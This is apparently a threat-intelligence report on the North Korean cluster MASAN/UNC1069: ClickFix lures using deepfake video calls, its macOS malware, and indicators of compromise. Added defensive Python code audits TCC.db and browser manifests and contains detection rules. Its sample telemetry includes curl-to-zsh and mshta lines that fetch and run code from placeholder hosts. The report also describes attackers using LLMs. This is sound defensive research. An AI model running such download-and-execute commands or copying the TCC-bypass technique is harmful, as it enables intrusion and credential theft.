Security researchers and geopolitical risk analysts track the Democratic People’s Republic of Korea (DPRK) as a primary pioneer of state-sponsored financial cybercrime. The Reconnaissance General Bureau (RGB) oversees a sprawling architecture of cyber units tasked with circumventing international sanctions and generating hard currency for the regime’s weapons programs. One specific cluster of activity, identified by investigators as UNC1069, MASAN, or CryptoCore, demonstrates a highly specialized focus on the cryptocurrency and decentralized finance (DeFi) sectors. This group has operated since at least 2018, evolving from traditional spear-phishing campaigns against financial institutions to the current high-fidelity social engineering operations targeting the Web3 ecosystem. The regime’s reliance on these actors highlights a strategic pivot where digital assets provide a frictionless medium for money laundering and asset exfiltration on a global scale.
The strategic importance of cryptocurrency for the North Korean state remains unparalleled in the history of cyber warfare. Analysts estimate that North Korean hackers stole approximately $1.34 billion in digital assets across 47 incidents in 2024 alone, accounting for 61% of the total amount stolen globally that year. The MASAN cluster contributes to this total by targeting high-value individuals and organizations, including centralized exchanges, software developers at FinTech firms, and executives at venture capital funds. The group’s shift toward the Web3 industry in 2023 reflects an understanding of the vulnerabilities inherent in decentralized protocols and the high-trust environment of the venture capital world.
Attribution in the North Korean cyber landscape often reveals overlapping monikers and shared technical resources. MASAN frequently displays tactics, techniques, and procedures (TTPs) that align with BlueNoroff and the broader Lazarus Group. These clusters share a common directive: the pursuit of financial gain to support the regime’s economic survival. While some investigative teams distinguish UNC1069 by its unique malware families like WAVESHAPER and DEEPBREATH, the underlying strategic alignment points toward a centralized command structure within the RGB.
The Evolution of MASAN (UNC1069/CryptoCore)
The MASAN threat group represents a highly patient and methodical adversary. Unlike less sophisticated actors who rely on automated spray-and-pray techniques, MASAN operators invest significant time in reconnaissance and rapport-building. The group’s history since 2018 shows a progression from targeting South Korean cryptocurrency exchanges to an international footprint that encompasses the United States, Europe, and the Middle East. Analysts identify MASAN by its persistent use of social engineering lures delivered through professional networking platforms and encrypted messaging applications.
The group utilizes compromised social media accounts of legitimate industry professionals to enhance the credibility of its lures. These hijacked accounts often belong to venture capitalists or startup founders, allowing the attacker to approach secondary targets with an established layer of trust. The threat actor leverages the “executive” persona to propose meetings, technical partnerships, or investment opportunities, mirroring the everyday workflows of the cryptocurrency industry.
Recent operations indicate a transition from simple productivity gains via artificial intelligence (AI) to the deployment of novel AI-enabled lures in active operations. The Google Threat Intelligence Group (GTIG) documented this shift in late 2025, noting that MASAN now uses large language models (LLMs) to refine the language of its lures and perform technical research on target environments. This integration of generative AI allows MASAN to scale its operations while maintaining the high quality of its deception.
AI-Enabled Social Engineering
Deception constitutes the core of MASAN’s initial access strategy. The threat actor initiates contact via Telegram, often using the account of a compromised cryptocurrency executive to build rapport with the target. The attacker discusses potential business collaborations for several days or weeks before moving to the next stage of the attack. The rapport-building phase creates a psychological environment where the victim feels safe and professional, lowering their defenses against technical anomalies.
The attacker schedules a 30-minute meeting using Calendly, a legitimate service that provides a sense of professional legitimacy. The Calendly link redirects the victim to a spoofed Zoom environment hosted on actor-controlled infrastructure, such as zoom[.]uswe05[.]us. Within this fake meeting, the actor employs high-fidelity deception techniques, including the reported use of AI-generated deepfake videos. Victims have described seeing a realistic representation of a well-known CEO from another cryptocurrency firm, which reinforces the belief that the meeting is genuine.
Deception continues within the meeting through the simulation of technical issues. The fake video call interface facilitates a ruse where the victim appears to experience audio or connectivity failures. The threat actor uses this “technical friction” to pivot to a ClickFix attack. This methodology tricks the victim into resolving a purported technical problem by executing malicious commands provided on a fake troubleshooting webpage. The psychological relief of “fixing” the meeting audio often blinds the user to the danger of running unverified code on their system.
Exploiting Technical Friction
The ClickFix stage represents the bridge between human deception and technical compromise. MASAN provides the victim with a link to a webpage that displays specific “troubleshooting” commands tailored to the victim’s operating system. For macOS targets, the commands appear to profile the system’s audio hardware and check for software updates. For Windows targets, the commands manipulate the system volume and device enumerators.
The macOS troubleshooting sequence typically includes a critical command that fetches a remote script and pipes it directly into the Zsh shell:
The use of the curl utility to download and immediately execute a script is a classic indicator of a sophisticated downloader. By embedding this command within a string of legitimate-looking system profiling tools like system_profiler SPAudioData, the attacker increases the likelihood that a technical user will perceive the sequence as a standard diagnostic routine.
Windows targets receive a different command sequence designed to execute a malicious HTML application (HTA) via the mshta utility:
The mshta proxy execution technique allows the attacker to bypass certain security controls and run scripts that can launch secondary payloads, such as PowerShell or executable binaries. The inclusion of commands like setx audio_volume 100 further serves the ruse by visibly altering the system state to match the purported goal of the troubleshooting.
Stage 1 Malware (WAVESHAPER)
The initial infection chain deploys WAVESHAPER, a packed C++ backdoor designed for macOS. WAVESHAPER functions as a persistent gateway into the compromised host, enabling the threat actor to download and execute arbitrary payloads retrieved from the C2 server. The malware utilizes an unknown packer to obscure its code and hinder automated analysis.
WAVESHAPER initiates its execution by forking into a background daemon process. This technique detaches the malware from the parent terminal session, ensuring that it continues to run even if the victim closes the browser or terminal used during the ClickFix stage. The backdoor leverages the curl library for C2 communication, supporting both HTTP and HTTPS protocols depending on the command-line parameters provided during deployment.
System reconnaissance forms a major part of WAVESHAPER’s initial activity. The malware collects a comprehensive suite of data to profile the victim host, including:
- A unique 16-character alphanumeric UID for tracking the victim.
- The username and machine name to identify the specific target.
- The system time zone and boot time for scheduling and activity tracking.
- A list of recently installed software and hardware model details.
- CPU information and the current operating system version.
- A complete list of running processes to identify security software and potential conflicts.
The malware transmits this data to the C2 server via HTTP POST requests. Payloads retrieved by the backdoor are typically saved to hidden files within the /tmp/ directory, following a regular expression pattern like /tmp/\.[A-Za-z0-9]{6}. This initial footprint provides the actor with the telemetry needed to select subsequent tools based on the victim’s environment and security posture.
Stage 2 Malware (HYPERCALL and HIDDENCALL)
The threat actor pivots from the initial backdoor to more specialized downloaders and interactive tools. HYPERCALL, a Go-based downloader, serves as the primary mechanism for deploying memory-resident payloads. HYPERCALL retrieves malicious dynamic libraries (dylibs) from designated C2 servers and reflectively loads them to minimize the on-disk footprint.
The downloader stores its configuration, including C2 server addresses, in an RC4-encrypted file located at /Library/SystemSettings/.CacheLogs.db. HYPERCALL uses a 16-byte hard-coded RC4 key to decrypt this data. Communication with the C2 infrastructure occurs via WebSockets (WSS), using domains like supportzm[.]com and zmsupport[.]com. After registering with the server, HYPERCALL requests a binary payload for the “darwin” system architecture. The server sends the payload in chunks, which HYPERCALL eventually executes in memory using the NSCreateObjectFileImageFromMemory API.
The primary payload delivered by HYPERCALL is HIDDENCALL, an interactive Go-based backdoor. Analysts identified HIDDENCALL as the component providing “hands-on keyboard” access to the compromised host. Forensic inquiry into the Rosetta cache revealed significant technical details about HIDDENCALL’s capabilities. Because the malware was compiled for x86_64 architecture but executed on ARM-based macOS hardware, the operating system generated Ahead-of-Time (AOT) translation files. These files preserved internal symbols that revealed the malware’s project structure and capabilities.
Symbols identified in the HIDDENCALL AOT file indicate a broad range of malicious functions:
- File system management: _t/common.add_file_to_zip, _t/common.zip_file, _t/common.unzipFile.
- Network and C2 operations: _t/common.rc4_encode, _t/common.resolve_server, _t/common.send_data.
- Interactive shell management: _t/common.rsp_new_shell, _t/common.rsp_exit_shell, _t/common.start_shell_reader.
- Process and system manipulation: _t/common.rsp_inject, _t/common.wipe_file, _t/common.exec_command_with_timeout.
These capabilities allow the threat actor to perform fine-grained data exfiltration, maintain persistent shell access, and modify the system environment in real time. The shared “_t/common” symbol-naming convention and overlapping Go libraries between HYPERCALL and HIDDENCALL strongly suggest a unified development environment managed by MASAN’s malware authors.
DEEPBREATH Analysis
The ultimate goal of the MASAN intrusion is the exfiltration of sensitive credentials and digital assets. DEEPBREATH, a data miner written in Swift, represents the group’s most sophisticated tool for this purpose on the macOS platform. The malware targets the Transparency, Consent, and Control (TCC) database, which is the core security mechanism protecting user privacy on macOS.
DEEPBREATH avoids standard permission prompts by programmatically manipulating the TCC.db file. The malware leverages the Finder application, which possesses Full Disk Access (FDA) permissions, to move and rename the user’s TCC folder. This action allows the malware to stage the TCC.db file in a temporary location where it can inject unauthorized permissions without being challenged by the operating system’s protection mechanisms. After injecting permissions for folders like Desktop, Documents, and Downloads, the malware restores the modified database to its original location.
The integration of AI extends to malware development. Forensic evidence found in stealers associated with MASAN and its affiliates reveals AI-generated comments and script structures. This suggests that the group is using AI to accelerate the coding of its infection chains and to introduce new programming languages, such as Nim and Swift, into its arsenal with minimal friction. The use of AI-driven automation allows MASAN to manage a high volume of concurrent victims, adjusting its strategies in real time based on the beaconing activity it receives.
With elevated access secured, DEEPBREATH systematically harvests high-value information:
- Credentials from the user’s Keychain (login.keychain-db).
- Browser data, including cookies, logins, and settings from Google Chrome, Brave, and Microsoft Edge.
- Session and user data from multiple versions of the Telegram application.
- Sensitive information stored in the Apple Notes database.
The malware stages the collected data in a temporary folder, compresses it into a ZIP archive, and exfiltrates the archive using the curl utility. This bypass technique highlights the attacker’s deep understanding of macOS internal security architecture and their ability to exploit default application permissions to circumvent user consent.
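A defender-side check for the TCC manipulation described above, added here as an example and not taken from the report or from DEEPBREATH itself. It assumes a simplified subset of the real `access` table columns (service, client, client_type, auth_value, csreq, last_modified), and its three heuristics (a grant with no code requirement recorded, several folder grants written in the same second, a client not on an allowlist) are the author's, not a documented DEEPBREATH signature; the sample database and its client path are constructed.

```python
"""Audit a copy of a macOS TCC.db for folder grants that look injected rather than prompted."""
import sqlite3
from collections import Counter

# Real TCC service identifiers for the folders the report says DEEPBREATH grants itself,
# plus Full Disk Access.
FOLDER_SERVICES = (
    "kTCCServiceSystemPolicyDesktopFolder",
    "kTCCServiceSystemPolicyDocumentsFolder",
    "kTCCServiceSystemPolicyDownloadsFolder",
    "kTCCServiceSystemPolicyAllFiles",
)
ALLOWED = 2  # auth_value meaning "allowed"


def audit_tcc(conn, expected_clients=frozenset()):
    """Return one finding per allowed folder/FDA grant that trips at least one heuristic."""
    query = ("SELECT service, client, client_type, auth_value, csreq, last_modified "
             "FROM access WHERE auth_value = ? AND service IN (%s)"
             % ",".join("?" * len(FOLDER_SERVICES)))
    rows = conn.execute(query, (ALLOWED, *FOLDER_SERVICES)).fetchall()
    # A user approves one prompt at a time; a bulk injection lands several grants for
    # one client in the same second. (Heuristic, assumption of this example.)
    burst = Counter((r[1], r[5]) for r in rows)
    findings = []
    for service, client, client_type, _auth, csreq, ts in rows:
        reasons = []
        if csreq is None:
            reasons.append("no code requirement (csreq) recorded for the grant")
        if burst[(client, ts)] >= 3:
            reasons.append("three or more folder grants written in the same second")
        if expected_clients and client not in expected_clients:
            reasons.append("client not on the expected allowlist")
        if reasons:
            findings.append({"service": service, "client": client,
                             "client_type": client_type, "last_modified": ts,
                             "reasons": reasons})
    return findings


def build_sample_db():
    """Constructed in-memory TCC.db subset: one prompted grant, one denial, three injected grants."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE access (
        service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL,
        auth_value INTEGER NOT NULL, csreq BLOB, last_modified INTEGER NOT NULL)""")
    rows = [
        # Legitimate: Terminal approved via the prompt; csreq carries a code-requirement blob.
        ("kTCCServiceSystemPolicyDesktopFolder", "com.apple.Terminal", 0, ALLOWED,
         b"\xfa\xde\x0c\x00placeholder", 1730000000),
        # A denial must never be flagged.
        ("kTCCServiceSystemPolicyDownloadsFolder", "com.apple.Terminal", 0, 0, None, 1730000100),
    ]
    # Injected: a path-type client (placeholder path in the report's /tmp staging style),
    # three folder grants, one timestamp, no code requirement.
    for svc in FOLDER_SERVICES[:3]:
        rows.append((svc, "/tmp/.a1B2c3", 1, ALLOWED, None, 1730005000))
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


if __name__ == "__main__":
    for f in audit_tcc(build_sample_db(), expected_clients={"com.apple.Terminal"}):
        print(f["client"], f["service"], f["reasons"])
```

Run it against a copy of the database taken during forensic collection; reading the live user TCC.db itself requires Full Disk Access.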
CHROMEPUSH Analysis
MASAN complements the host-level data mining of DEEPBREATH with the browser-level exploitation of CHROMEPUSH. CHROMEPUSH is a data miner written in C++ that functions as a malicious browser extension for Chromium-based browsers, including Google Chrome, Brave, Arc, and Microsoft Edge. The malware masquerades as a legitimate extension for editing Google Docs offline to avoid scrutiny from the user.
CHROMEPUSH establishes persistence by installing itself as a native messaging host. The malware copies itself to the user’s Application Support directory and creates a manifest file, com.google.docs.offline.json, which ensures that the browser executes the malicious component automatically upon startup. This mechanism allows the malware to maintain a persistent presence even if the browser’s extension manager is audited.
The capabilities of CHROMEPUSH include:
- Keylogging to capture keystrokes and sensitive input fields.
- Stealing browser cookies and session tokens to facilitate account takeover.
- Capturing screenshots of the user’s desktop at configurable intervals.
The malware reads its configuration from a hidden database file at %HOME%/Library/Application Support/com.apple.os.receipts/setting.db. This configuration controls parameters such as cap_on (screen captures), coo_on (cookie access), and key_on (keylogging). CHROMEPUSH stages the collected data in temporary files with specific prefixes: CA for screenshots, KL for keylogging, and CK for cookies. It then uploads these files to its C2 server, cmailer.pro, via HTTP POST requests.
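The native messaging host persistence above can be audited from the manifests alone. The following is an added example, not code from the report or from CHROMEPUSH; it assumes Chromium's documented manifest schema (name, description, path, type, allowed_origins), the user-level host directories for Chrome, Brave and Edge on macOS, and constructed manifests whose paths and extension IDs are placeholders.

```python
"""Flag Chromium native messaging host manifests that look like CHROMEPUSH persistence."""
import json
import os
import re
from pathlib import Path

# User-level host directories (relative to $HOME) for the browsers the report names
# that this example covers; Arc is omitted because its layout is not assumed here.
HOST_DIRS = [
    "Library/Application Support/Google/Chrome/NativeMessagingHosts",
    "Library/Application Support/BraveSoftware/Brave-Browser/NativeMessagingHosts",
    "Library/Application Support/Microsoft Edge/NativeMessagingHosts",
]
KNOWN_BAD_NAMES = {"com.google.docs.offline"}  # manifest name reported for CHROMEPUSH
VENDOR_PREFIX_RE = re.compile(r"^com\.(google|apple|microsoft)\.")


def audit_manifest(manifest, filename, home):
    """Return the reasons one manifest is suspicious (empty list means nothing found)."""
    reasons = []
    name = manifest.get("name", "")
    path = manifest.get("path", "")
    if name in KNOWN_BAD_NAMES:
        reasons.append(f"host name {name} matches the CHROMEPUSH manifest")
    if Path(filename).stem != name:  # Chromium requires <name>.json
        reasons.append("manifest filename does not match its name field")
    if manifest.get("type") != "stdio":
        reasons.append("unexpected host type")
    if not os.path.isabs(path):
        reasons.append("host path is not absolute")
    app_support = os.path.join(home, "Library", "Application Support")
    if path.startswith(app_support + os.sep):  # report: malware copies itself here
        reasons.append("host binary lives in the user's Application Support folder")
    if VENDOR_PREFIX_RE.match(name) and not path.startswith("/Applications/"):
        reasons.append("vendor-style name but binary outside /Applications")
    origins = manifest.get("allowed_origins", [])
    if not origins or any(not o.startswith("chrome-extension://") for o in origins):
        reasons.append("allowed_origins missing or not an extension origin")
    return reasons


def audit_home(home):
    """Walk the known host directories under `home`; map manifest path to its reasons."""
    findings = {}
    for rel in HOST_DIRS:
        directory = Path(home) / rel
        if not directory.is_dir():
            continue
        for f in sorted(directory.glob("*.json")):
            try:
                manifest = json.loads(f.read_text())
            except (OSError, ValueError):
                findings[str(f)] = ["manifest is unreadable or not valid JSON"]
                continue
            reasons = audit_manifest(manifest, f.name, home)
            if reasons:
                findings[str(f)] = reasons
    return findings


# Constructed manifests for a stand-alone run; extension IDs and paths are placeholders.
BENIGN = {
    "name": "com.example.pwmanager",
    "description": "Password manager host",
    "path": "/Applications/ExamplePW.app/Contents/MacOS/pw-host",
    "type": "stdio",
    "allowed_origins": ["chrome-extension://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/"],
}
SUSPICIOUS = {
    "name": "com.google.docs.offline",
    "description": "Google Docs Offline",
    "path": "/Users/alice/Library/Application Support/com.apple.os.receipts/docs-offline",
    "type": "stdio",
    "allowed_origins": ["chrome-extension://bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb/"],
}

if __name__ == "__main__":
    print(audit_manifest(BENIGN, "com.example.pwmanager.json", "/Users/alice"))
    print(audit_manifest(SUSPICIOUS, "com.google.docs.offline.json", "/Users/alice"))
    print(audit_home(os.path.expanduser("~")))
```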
SILENCELIFT and SUGARLOADER
MASAN utilizes SILENCELIFT and SUGARLOADER to maintain long-term access and control over the compromised environment. SILENCELIFT is a minimalistic backdoor written in C/C++ that beacons basic host information to the C2 server support-zoom[.]us. It retrieves a unique ID from the file path /Library/Caches/.Logs.db, which is the same location used by CHROMEPUSH, indicating coordination between different malware families.
A unique feature of SILENCELIFT is its ability to manipulate Telegram communications. If the malware runs with root privileges, it can use the pkill -STOP and pkill -CONT commands to freeze and resume the Telegram process. This capability allows the threat actor to silently interrupt the user’s communication, possibly to prevent the user from seeing security alerts or to facilitate the actor’s use of a compromised Telegram account for lateral movement.
SUGARLOADER, a legacy C++ downloader historically associated with MASAN, serves as a fallback persistence mechanism. During recent intrusions, researchers observed the actor using a Launch Daemon, com.apple.system.updater.plist, to execute SUGARLOADER automatically during the system startup process. SUGARLOADER checks for an RC4-encrypted configuration file at /Library/OSRecovery/com.apple.os.config and downloads subsequent payloads from servers such as breakdream[.]com and dreamdie[.]com. The deployment of multiple disparate persistence mechanisms across a single host demonstrates MASAN’s commitment to maintaining a durable foothold.
The Integration of Generative AI in the Adversary Lifecycle
MASAN has transitioned from using AI for basic tasks to integrating it into the core of its operational lifecycle. The group leverages LLMs like Gemini to conduct deep reconnaissance and technical research. Security analysts documented instances where the actor used AI to research specific cryptocurrency concepts and identify the precise file paths for wallet application data on different operating systems.
The actor also uses AI to generate lure materials and other messaging related to cryptocurrency investments. This allows the group to produce convincing professional correspondence in multiple languages, effectively expanding its target pool beyond English-speaking victims. Furthermore, research into MASAN-aligned groups like BlueNoroff suggests that the actors are using GPT-4o models to modify images and generate high-fidelity deepfake content for their video calls.
Forensic Artifacts and Detection Strategies
The absence of enterprise security tools on many target systems does not prevent the reconstruction of MASAN’s activities. Forensic analysts rely on built-in macOS features to identify and track the intrusion. The XProtect Behavioral Service (XBS) logs metadata about programs that violate behavioral rules in an SQLite database at /var/protected/xprotect/XPdb. These logs provide a timestamped sequence of events, allowing investigators to identify malicious binaries even if the attacker has deleted them from the disk.
Rosetta cache analysis provides another critical avenue for investigation. The generation of Ahead-of-Time (AOT) translation files for x86_64 binaries on ARM systems leaves persistent artifacts in /var/db/oah/. These files contain symbols and project paths that can reveal the original names and functions of memory-resident malware like HIDDENCALL. Investigators utilized these artifacts to confirm the relationship between the HYPERCALL downloader and the interactive backdoor components of the intrusion.
Monitoring for behavioral indicators remains the most effective method for detecting MASAN activity in real-time. High-confidence indicators include:
- Executing curl or mshta commands from atypical browser or terminal processes.
- Identifying Launch Daemons with names masquerading as system updates, such as com.apple.system.updater.
- Detecting unauthorized modifications to the TCC.db or the presence of staged database files in /tmp/.
- Observing hidden files and directories in sensitive locations like /Library/SystemSettings/ or ~/Library/Application Support/com.apple.os.receipts/.
- Identifying unusual browser extension manifests and native messaging hosts that do not correspond to known legitimate applications.
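The indicator list above, together with the ClickFix command patterns and the WAVESHAPER /tmp staging regex from earlier sections, can be encoded as rules over endpoint telemetry. This is an added example, not tooling from the report: the event field names are an assumption rather than any specific EDR's schema, and the telemetry records are constructed, with placeholder hostnames.

```python
"""Rule-based triage of the MASAN behavioral indicators over process and file-write events."""
import re
from dataclasses import dataclass

SHELL_PIPE_RE = re.compile(r"\|\s*(zsh|bash|sh)\b")      # curl ... | zsh (ClickFix, macOS)
ATYPICAL_PARENTS = {"Google Chrome", "Brave Browser", "Arc", "Microsoft Edge",
                    "Safari", "Terminal", "iTerm2", "chrome.exe", "msedge.exe"}
TMP_STAGING_RE = re.compile(r"^/tmp/\.[A-Za-z0-9]{6}$")  # WAVESHAPER payload files
FAKE_DAEMON_RE = re.compile(r"^/Library/LaunchDaemons/com\.apple\.[\w.]*updater[\w.]*\.plist$")
HIDDEN_PATH_RE = re.compile(
    r"^(/Library/SystemSettings/|/Users/[^/]+/Library/Application Support/"
    r"com\.apple\.os\.receipts/)")
TCC_DB_RE = re.compile(r"TCC\.db$")


@dataclass
class Event:
    kind: str            # "exec" or "file_write"
    process: str         # image name of the acting process
    parent: str = ""     # parent image name (exec events)
    cmdline: str = ""    # full command line (exec events)
    path: str = ""       # target path (file_write events)


def check_exec(ev):
    """Indicators 1 of the list: curl/mshta from a browser or terminal, plus pipe-to-shell."""
    hits = []
    name = ev.process.lower()
    if name in ("curl", "mshta", "mshta.exe") and ev.parent in ATYPICAL_PARENTS:
        hits.append(f"{ev.process} launched from atypical parent {ev.parent}")
    if name == "curl" and SHELL_PIPE_RE.search(ev.cmdline):
        hits.append("remote script piped straight into a shell")
    if name in ("mshta", "mshta.exe") and re.search(r"https?://", ev.cmdline, re.I):
        hits.append("mshta executing a remote HTA")
    return hits


def check_file_write(ev):
    """Indicators 2-4 of the list plus the /tmp staging pattern from the WAVESHAPER section."""
    hits = []
    if TMP_STAGING_RE.match(ev.path):
        hits.append("hidden six-character staging file in /tmp")
    if FAKE_DAEMON_RE.match(ev.path):
        hits.append("launch daemon masquerading as an Apple updater")
    if HIDDEN_PATH_RE.match(ev.path):
        hits.append("write under a hidden config directory named in the report")
    if TCC_DB_RE.search(ev.path) and (ev.path.startswith("/tmp/") or ev.process != "tccd"):
        hits.append("TCC.db written by a process other than tccd, or staged in /tmp")
    return hits


def triage(events):
    """Return [(event_index, [reasons...])] for every event that matches at least one rule."""
    findings = []
    for i, ev in enumerate(events):
        hits = check_exec(ev) if ev.kind == "exec" else check_file_write(ev)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed telemetry modelled on the intrusion narrative; hostnames are placeholders.
SAMPLE_EVENTS = [
    Event("exec", "curl", parent="Google Chrome",
          cmdline="curl -s https://clickfix.example.invalid/fix.sh | zsh"),
    Event("exec", "system_profiler", parent="Terminal", cmdline="system_profiler SPAudioData"),
    Event("file_write", "sh", path="/tmp/.k9Qx2a"),
    Event("file_write", "installer", path="/Library/LaunchDaemons/com.apple.system.updater.plist"),
    Event("file_write", "Finder", path="/tmp/TCC/TCC.db"),
    Event("file_write", "tccd", path="/Users/alice/Library/Application Support/com.apple.TCC/TCC.db"),
    Event("file_write", "hypercall", path="/Library/SystemSettings/.CacheLogs.db"),
    Event("exec", "mshta.exe", parent="chrome.exe",
          cmdline="mshta.exe http://clickfix.example.invalid/fix.hta"),
    Event("exec", "curl", parent="brew", cmdline="curl -fsSL https://pkgs.example.invalid/x.json"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].kind, reasons)
```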
Infrastructural Analysis and C2 Operations
MASAN infrastructure demonstrates a reliance on domains that mimic legitimate services to enhance its social engineering lures. The group frequently uses typosquatting or thematic domains, such as zoom[.]uswe05[.]us for fake meetings and supportzm[.]com or zmsupport[.]com for C2 operations. The group also utilizes descriptive domains like mylingocoin[.]com to host its ClickFix payloads and cmailer.pro for data exfiltration.
The group utilizes the RC4 algorithm for configuration encryption across multiple malware families, often with hard-coded keys. This suggests a centralized approach to malware configuration management within the group’s development environment. Furthermore, the usage of WebSockets (WSS) for HYPERCALL communication provides a persistent, low-latency connection for real-time interaction with the victim host.
Analysis of the group’s network activity reveals a methodical approach to data exfiltration. The use of the curl utility to upload ZIP archives allows the actor to leverage a legitimate system tool that is unlikely to be blocked by basic firewalls. The staging of data in hidden directories before exfiltration ensures that the actor can collect a large volume of information without triggering immediate alerts based on unusual file transfers.
Strategic Implications for the Global Cryptocurrency Economy
The activities of the MASAN cluster represent a significant threat to the integrity of the global cryptocurrency market. By targeting centralized exchanges and DeFi platforms, the regime gains access to vast pools of liquid assets that can be rapidly laundered. The group’s focus on session tokens and cookies allows it to bypass multi-factor authentication, demonstrating that even organizations with strong authentication protocols are vulnerable to session hijacking.
The integration of AI into MASAN’s tradecraft significantly lowers the barrier to entry for high-stakes social engineering. As deepfake technology becomes more accessible, the ability to distinguish between legitimate and malicious remote interactions will continue to diminish. This evolution requires the cryptocurrency industry to rethink its trust models, particularly for remote-first environments where business is conducted almost exclusively through video calls and encrypted messaging.
Furthermore, the focus on stealing data from Apple Notes and Telegram sessions highlights the risk of “shadow data” within organizations. Many developers and executives store sensitive information, such as recovery phrases and private keys, in these informal applications, providing a lucrative target for adversaries. The MASAN cluster’s ability to exfiltrate this data illustrates the need for more rigorous data protection policies and the use of secure password managers instead of general-purpose note-taking apps.
Projections and Conclusion
The MASAN cluster will likely continue to refine its AI-enabled tactics, integrating more realistic deepfakes and automated communication tools into its social engineering campaigns. The group’s shift toward the Web3 industry is expected to accelerate as more capital moves into decentralized protocols. Analysts anticipate that the group will also expand its cross-platform capabilities, developing more sophisticated tools for Linux and mobile environments to target a broader range of developers and investors.
Defense against MASAN requires a transition to a zero-trust architecture for all remote communication. Organizations must verify the identity of participants through multiple out-of-band channels and restrict the execution of unverified scripts and commands on employee systems. Technical defenses should focus on behavioral monitoring of system utilities and the rigorous auditing of sensitive operating system databases like the TCC on macOS.
The North Korean regime’s strategic commitment to cyber-financing ensures that MASAN and similar clusters will remain a primary threat to the financial stability of the digital asset sector. Ongoing cooperation between threat intelligence firms, financial institutions, and law enforcement is essential to identifying and disrupting the group’s infrastructure. By understanding the psychological and technical nuances of MASAN’s operations, the global community can better defend against the next generation of AI-enabled financial cybercrime.
The MASAN cluster’s use of high-fidelity deception, sophisticated data miners like DEEPBREATH and CHROMEPUSH, and the persistent integration of generative AI demonstrates a high level of operational maturity. As the threat landscape continues to evolve, the resilience of the cryptocurrency ecosystem will depend on its ability to adapt to these increasingly complex state-sponsored threats. Effective defense must be as adaptive and multifaceted as the adversary itself, combining technical rigor with a deep understanding of the human elements of deception.
Investigation into Russian-speaking forums and platforms like VK and OK reveals that MASAN operators frequently monitor the cybersecurity discourse in these regions to identify new vulnerabilities and techniques. While some search results on these platforms may produce false positives, the threat actor’s choice of monikers and malware names often reflects a desire to blend into the “noise” of popular culture and legitimate software development. This strategy further complicates detection and attribution efforts, as analysts must sift through vast amounts of benign data to identify the subtle signals of a MASAN intrusion.
The regime’s cyber program remains a critical pillar of its national security strategy. By leveraging the MASAN cluster to exfiltrate billions in digital assets, the DPRK demonstrates a clear ability to weaponize the global financial infrastructure for its own ends. The ongoing evolution of MASAN’s tradecraft, from the simple use of Python scripts to the current deployment of Swift and Go-based malware and AI-enabled deepfakes, signals a determined and well-resourced adversary. Continued vigilance and the development of advanced behavioral detection capabilities are the only paths forward in mitigating the impact of this formidable state-sponsored actor.
Strategic analysis suggests that as international sanctions tighten, the frequency and severity of MASAN’s operations will likely increase. The group serves as an essential economic valve for the regime, providing the funds necessary for both elite lifestyle preservation and military modernization. The intersection of geopolitical desperation and high-tech capability makes MASAN one of the most dangerous actors currently operating in the cyber-financial domain. Future defense strategies must account for the regime’s high risk tolerance and its willingness to invest years in a single, high-value intrusion.
The documented case of the fintech entity compromise underscores the vulnerability of even technically proficient organizations to well-executed social engineering. The combination of hijacked executive accounts, professional scheduling via Calendly, and the visual authority of a deepfake CEO created a chain of trust that the victim could not easily break. This incident serves as a stark reminder that in the era of generative AI, seeing and hearing are no longer sufficient for believing. Comprehensive verification and the enforcement of rigid security protocols are the primary safeguards against the encroaching tide of AI-enabled state-sponsored deception.
MASAN’s activity is not an isolated phenomenon but part of a broader trend of state-sponsored actors utilizing the cryptocurrency market as a playground for innovation and exfiltration. The lessons learned from analyzing UNC1069 must be applied broadly across the financial sector to protect against the inevitable proliferation of these techniques to other adversary clusters. As MASAN continues to refine its toolkit and integrate the latest advancements in AI, the security community must remain equally committed to transparency, information sharing, and the development of proactive defense mechanisms.
